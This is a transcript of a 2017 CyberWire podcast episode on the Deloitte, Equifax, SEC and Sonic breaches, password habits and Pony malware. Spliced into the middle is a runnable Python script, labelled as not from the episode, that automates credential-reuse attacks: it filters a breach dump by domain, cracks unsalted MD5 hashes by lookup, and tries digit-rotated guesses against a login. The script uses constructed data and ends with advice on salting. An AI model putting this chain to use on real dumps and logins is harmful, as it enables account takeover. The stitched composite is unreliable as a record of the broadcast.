CyberWire Daily - Deloitte and Equifax under the microscope. Congress grills the SEC. Credential theft trends.
Episode Date: September 28, 2017

Deloitte and Equifax continue to find themselves under scrutiny, but we should all resist the urge to chase ambulances. The SEC commissioner gets a grilling from Congress, and we can't help but wonder if his Spidey sense was tingling. Chances are your credentials aren't as secure as you'd like them. Dale Drew from Level 3 Communications on attack patterns and lulls. Trip Nine from Comodo on credential theft trends. And Pyongyang is perched on a pile of coal.
Transcript
You're listening to the Cyber Wire Network, powered by N2K.
Deloitte and Equifax continue to find themselves under scrutiny,
but we should all resist the urge to chase ambulances.
The SEC commissioner gets a grilling from Congress,
and we can't help but wonder if his Spidey sense was tingling.
Chances are your credentials aren't as secure as you'd like them to be,
and Pyongyang is perched on a pile of coal.
I'm Dave Bittner in Baltimore with your CyberWire summary for Thursday, September 28, 2017.
Deloitte continues to deal with the consequences of its recently disclosed breach.
Many of those consequences are foreseeable piling on, as lawyers see, with some justification,
regulatory gaps exposed by the incident, and as security researchers put the Big Four consultancy under the microscope
and find all sorts of places where the company hasn't followed its own advice.
Those include proxy login credentials out on Google+, VPN credentials on GitHub, thousands
of hosts exposed on the internet, as seen on Shodan searches, and so forth.
Such results are practically inevitable for an
organization as big as Deloitte, which may or may not be comforting. There's no further word on
whether the breach is more damaging than Deloitte's initial minimalist characterization makes it out
to be, but the company and similar organizations are sure to receive a great deal of scrutiny in
the coming weeks. Turning to the other two high-profile breaches, the Equifax incident produces fresh waves
of hand-wringing and learned helplessness over the use of Social Security account numbers
as elements of identity management approaches.
Those old enough to remember getting their first Social Security card may also remember
the advice prominently printed on the card, not intended for purposes of identification.
So it seems the New Dealers who set the Social Security system up under President Roosevelt
may have seen something like this coming back in the 1930s, and we forgot their sound advice
somewhere circa 1995. As Chesterton said in Advice to Reformers, if you come across a fence whose purpose you don't understand,
wait until you know that purpose before you decide to tear the fence down.
The biggest lesson emerging from Equifax is the importance of sound incident response preparation,
especially with respect to disclosure and public communication.
Federal News Radio offered some good advice on this.
Quote, first, go public with
breaches as soon as you can. Otherwise, it looks like you're covering up. Crappy cyber practices
eventually come to light anyhow. You don't need a $5,000-a-day crisis management expert to tell you
that. Second, realize that bad cybersecurity is as inimical to your job as crashing the mission.
End quote. The Equifax mess has apparently also prompted what Palo Alto Networks deplores as ambulance chasing.
Palo Alto CEO Mark McLaughlin explained to Jim Cramer on Mad Money
that ambulance chasing means approaching a hacking victim
and telling them that you've got the solution that would have kept them out of trouble
if only they'd been smart enough to hire you.
McLaughlin said, quote,
What happens when you have major breaches like this?
First thing is, we don't chase the ambulance.
Nobody in companies appreciates that.
So if your security company's dialing in the next day saying,
First of all, I could definitely have stopped that for you,
or something along those lines,
you're going to be ignored.
After the fire is out, and you're thinking about the architectural design for the future...
And that's probably advice worth considering for anyone in the security sector.
For better or worse, passwords are still fairly ubiquitous when it comes to online credentials.
How you choose them and how you store them can make all the difference in the world, especially with large databases of breached
passwords readily available on the dark web. Trip Nine oversees the Threat Intelligence Programs
Division at Comodo, and he shares some of the credential compromise trends they've been seeing.
Everyone's familiar with a lot of the big breaches, LinkedIn, Dropbox, Adobe. However,
what a lot of people aren't familiar with is how hackers are using, let's say LinkedIn, for example,
in 2017. We're seeing most of those hashes cracked since they were unsalted MD5 hashes.
And it's very easy to uncover the plaintext passwords and also search for particular employees in an
organization. So that third party we're seeing do a lot of damage. It's kind of a weird side door
that hackers are using to get into organizations. Take us through exactly how does that work?
Okay. So what a hacker would be able to easily get a hold of is 170 million records, LinkedIn records, I should say, on the torrent network. They would just query for particular domains, for example, company ABC. And then from
that, they get the MD5 hash associated with that email address. And they would just take that over
to a cracking site like hashkiller.co.uk, enter it in, and near 100% of the time,
that hash will be cracked.
And they'll find the actual plain text password
for that employee.
And then they can use that to brute force attack
the organization.
The way that most people deal with their passwords
is they'll use the same phrase over and over again,
maybe modify one or two characters,
but it becomes very easy to
reverse engineer and figure out what the present day password is.
One of the things that you study is password psychology. That's something that's interesting
to me. How do people go about choosing their passwords and what are some of the common
mistakes they make? Well, most people in my own research only use two or three variations of the same word over and over again for years.
And what they'll do is when they're forced to change their password, they will just, if they have a numeric character in their password, they'll just go up one digit.
And what that tells a hacker is, you know, for a third-party data breach that might have happened a year or two back, they know that they can just count down in digits to try to brute force into a particular application.
What are some of the other techniques that you see in common use?
In contrast to third-party attacks, we're seeing a particular piece of malware called the Pony exploit,
which has been around for a few years,
but we're seeing it become more and more advanced.
It's very well engineered through botnet attacks.
We're seeing it just wreak havoc on enterprise organizations.
In fact, any U.S. enterprise organization, over 1,000 employees,
we usually find records, stolen records from Pony exploits, near 100% of the time. And that could be their customers, that could be their
vendors, their partners, or their internal employees. And so how do people find themselves
infected with this? We're seeing a lot of companies that we talk with, they had no idea
that it was a phishing attack on their director of HR. But the malware itself, it's not
like ransomware where you got the skull and crossbones that come up and demand money.
These silently just go in and they take copies of actual credentials that are stored inside of the
browser and then they exfiltrate it. Sometimes the code has an
auto-delete functionality built into it, so it leaves without a trace. Some of it is advanced
enough to really evade more legacy endpoint detection. So what is your advice for folks to
protect themselves against these kinds of things? First piece of advice would be not to store your
passwords inside of Google Chrome, at least right now, or Internet Explorer or Firefox. Most browser-based password managers
are very vulnerable. I would recommend LastPass or another password manager that has more security.
And also these particular types of exploits, they don't know how to look into those files of those third-party password managers.
There's no localized copies of the password stored onto the machine.
I see.
So be very careful about what passwords you store inside of a browser.
That's Trip Nine from Comodo.
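The side door Trip Nine describes, worked through end to end as an added example (this is not code from the episode or from Comodo): take a breach dump of unsalted hashes, keep only one organisation's addresses, crack them by table lookup, then try the "go up one digit" rotations against the target's real login. The interview describes the hashes as unsalted MD5, so the demo uses MD5; the same lookup attack works on any unsalted fast hash. Every email, password, wordlist entry and salt below is constructed for the demo, and the target organisation's login is simulated by a hypothetical `make_verifier` helper rather than any real service.

```python
"""Added example of the credential-reuse side door described in the interview.
Not code from the episode or from Comodo; all data below is constructed."""
import hashlib
import re
from typing import Callable, Dict, List, Optional, Tuple


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


# Constructed stand-in for a leaked "email:unsalted-md5" dump (LinkedIn-2012 style).
_BREACHED = {
    "alice@company-abc.example": "Summer2015",
    "bob@company-abc.example": "Welcome1",
    "carol@other.example": "password",
}
SAMPLE_DUMP = "\n".join(f"{e}:{md5_hex(p)}" for e, p in _BREACHED.items()) + "\n"

# Tiny wordlist standing in for the tables a cracking site has precomputed.
WORDLIST = ["password", "123456", "Welcome1", "Summer2015", "Winter2014", "letmein"]


def parse_dump(text: str) -> List[Tuple[str, str]]:
    """Parse 'email:md5hex' lines; skip anything malformed."""
    out = []
    for line in text.splitlines():
        email, sep, h = line.strip().partition(":")
        if sep and re.fullmatch(r"[0-9a-f]{32}", h):
            out.append((email.lower(), h))
    return out


def filter_domain(records: List[Tuple[str, str]], domain: str) -> List[Tuple[str, str]]:
    """The attacker queries the dump for one organisation's staff."""
    suffix = "@" + domain.lower()
    return [(e, h) for e, h in records if e.endswith(suffix)]


def build_lookup(words: List[str]) -> Dict[str, str]:
    """Unsalted hashing: one hash->plaintext table serves every user in every dump."""
    return {md5_hex(w): w for w in words}


def crack(records: List[Tuple[str, str]], lookup: Dict[str, str]) -> Dict[str, str]:
    """Pure dictionary lookup, no per-user hashing work at all."""
    return {e: lookup[h] for e, h in records if h in lookup}


def rotation_candidates(old: str, span: int = 3) -> List[str]:
    """'Go up one digit': vary the trailing number of a cracked password by +/- span."""
    m = re.search(r"(\d+)$", old)
    if not m:
        return [old]
    stem, digits = old[: m.start()], m.group(1)
    width = len(digits)
    cands = [old]
    for delta in range(1, span + 1):
        for n in (int(digits) + delta, int(digits) - delta):
            if n >= 0:
                cands.append(f"{stem}{n:0{width}d}")  # keep zero padding, e.g. 007 -> 008
    return cands


def guess_current(old: str, verify: Callable[[str], bool], span: int = 3) -> Optional[str]:
    """Try the rotation set against the organisation's login; return the one that works."""
    for cand in rotation_candidates(old, span):
        if verify(cand):
            return cand
    return None


# Constructed stand-in for the target organisation's current credentials.
_CURRENT = {"alice@company-abc.example": "Summer2017"}  # rotated twice since the breach


def make_verifier(email: str) -> Callable[[str], bool]:
    """Hypothetical login check: the org stores a salted SHA-256 (the breached site did not)."""
    salt = "9f3a"  # constructed per-user salt
    stored = hashlib.sha256((salt + _CURRENT.get(email, "")).encode()).hexdigest()
    return lambda pw: hashlib.sha256((salt + pw).encode()).hexdigest() == stored


def run_side_door(dump: str, domain: str) -> Dict[str, Optional[str]]:
    """Whole chain: dump -> domain filter -> lookup crack -> rotations -> live login."""
    cracked = crack(filter_domain(parse_dump(dump), domain), build_lookup(WORDLIST))
    return {e: guess_current(old, make_verifier(e)) for e, old in cracked.items()}


if __name__ == "__main__":
    print(run_side_door(SAMPLE_DUMP, "company-abc.example"))
```

`build_lookup` is all a cracking site's precomputed table amounts to: because the leaked hashes carry no salt, one table answers every user in every dump, which is why a lookup succeeds as often as the interview says. Prepend a per-user salt and the same table returns nothing for the same passwords; that, plus a deliberately slow hash, is the defender's side of this story. The rotation step is the second lesson: a years-old password that differs from today's by one digit is effectively today's password.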
Turning to the Securities and Exchange Commission, the U.S. Senate has been hearing from, and more importantly talking to, the Commissioner this week.
They've given him a grilling over the EDGAR breach the SEC recently disclosed, but the Senators have also been giving him some direction.
The upper chamber is uneasy about the SEC's coming regulatory regime, the Consolidated Audit Trail National Market System, CAT-NMS. This system is
designed to enable auditors to track all trading activity in the U.S. equity and options market.
It will encompass the exchanges, other federal regulatory agencies, and industry bodies as well,
and it appears to turn the financial sector into a panopticon for all of its participants,
from Wall Street to Main Street.
As Senator Mike Crapo, a Republican from Idaho, pointed out to the SEC Commissioner,
that's great power and great responsibility, so they'd better get it right. You don't have to be
J. Jonah Jameson to think that the Edgar breach suggests the SEC won't do as well as Peter Parker.
The breach of Sonic remains under investigation.
Sonic, of course, is the chain of drive-ins headquartered in Oklahoma
that has almost 3,600 locations in North America.
It appears that the incident might be linked to the roughly 5 million pay cards
that just turned up in the Joker's Stash, a dark web market run by and for carders.
Fast food restaurants handle a lot of pay cards, which makes them attractive targets.
Since last year, Chipotle, Wendy's, and Arby's have all been hit.
North Korea's got a lot of coal it can't sell.
Coal has been the DPRK's principal export for some time.
We hear that they're sitting on $9.7 trillion worth of the stuff.
That's trillion with a T.
Anyone who's got anything worth stealing online
should look to their defenses.
Pyongyang's especially interested
in cryptocurrency wallets these days,
and those nuclear and ballistic missile programs
aren't going to pay for themselves.
Joining me once again is Dale Drew. He's the Chief Security Officer at Level 3 Communications.
Dale, good to have you back. You wanted to talk today about some
patterns that you have noticed and wondering if maybe we're in a lull before a storm. What do
you want to share with us here? Yeah, so my goal is not to carry the sign that says this is the
end of the world. However, there was a study just released by CNN that says that 4% of surveyed Americans were worried about the eclipse.
So I want to be careful in the language I choose not to alarm anybody.
But, you know, I think our concern is from a trend perspective.
If you look at some of these massive global events, cybersecurity events that have occurred.
About five years ago, we would have a massive security event once every four to five years.
And how would you define massive?
What I would say is something that impacts probably more than three to four countries at a time.
And so from an internet service provider perspective, our sort of issues were when there was a major defect with a routing provider.
For companies, it was if there was a major defect that affected all versions of Windows or all versions of Unix and they were all publicly exposed.
You knew what every security organization was doing because everyone had to sort of group together to figure out how to block and tackle and then patch and prevent during those sort of times.
And we'd see those every four to five years. About three years ago, we saw a trend where that
was happening roughly every 18 months. Bad guys were being more diligent in researching really,
really old code.
And the nation states do it because the nation states want to find exposures that have the most access across the internet infrastructure or the corporate infrastructure.
Bad guys are learning from those techniques,
and they're also researching really, really old internet code
and really, really old operating system code
to find a way
to have as much accessible infrastructure as they possibly can, either for infrastructure capability (you know, I want to build a huge botnet), for access to data (the more systems I have, the more PII and confidential information I can find), or for extortion.
You know, we've seen a huge surge with WannaCry and Petya of spam ransomware.
I'm going to encrypt 600,000 machines at once and then ask for $300.
And if I get 10% of the people to respond, that's better than a targeted attack against a few corporations.
So our biggest fear is in the first half of 2017, we've already had two major global security events that have impacted, in one case, hundreds of thousands of victims, the other case, tens of thousands of victims.
And so we're definitely seeing a shift in the professional bad guys employing more and more nation-state techniques to be able to gain access to more infrastructure.
This is something that, from a, you know, what-do-you-do perspective,
this is something that really is going to rely on more vendors to make sure that they review their embedded code to look for those exposures the same way the bad guys are and hopefully find
it faster. And for companies and corporations and network providers to spend more diligence
in protecting their infrastructure, having a patch process so that
when an exposure does come, you know how to block access to it, patch it, and prevent it,
and to stay diligent on people who are trying to access that infrastructure. So when you can't
prevent, you have to monitor. So diligence, I think, is the key in the coming months and
coming years. All right. Dale Drew, thanks for joining us.
And that's the CyberWire. We are proudly produced in Maryland by our talented team of editors and producers. I'm Dave Bittner. Thanks for listening.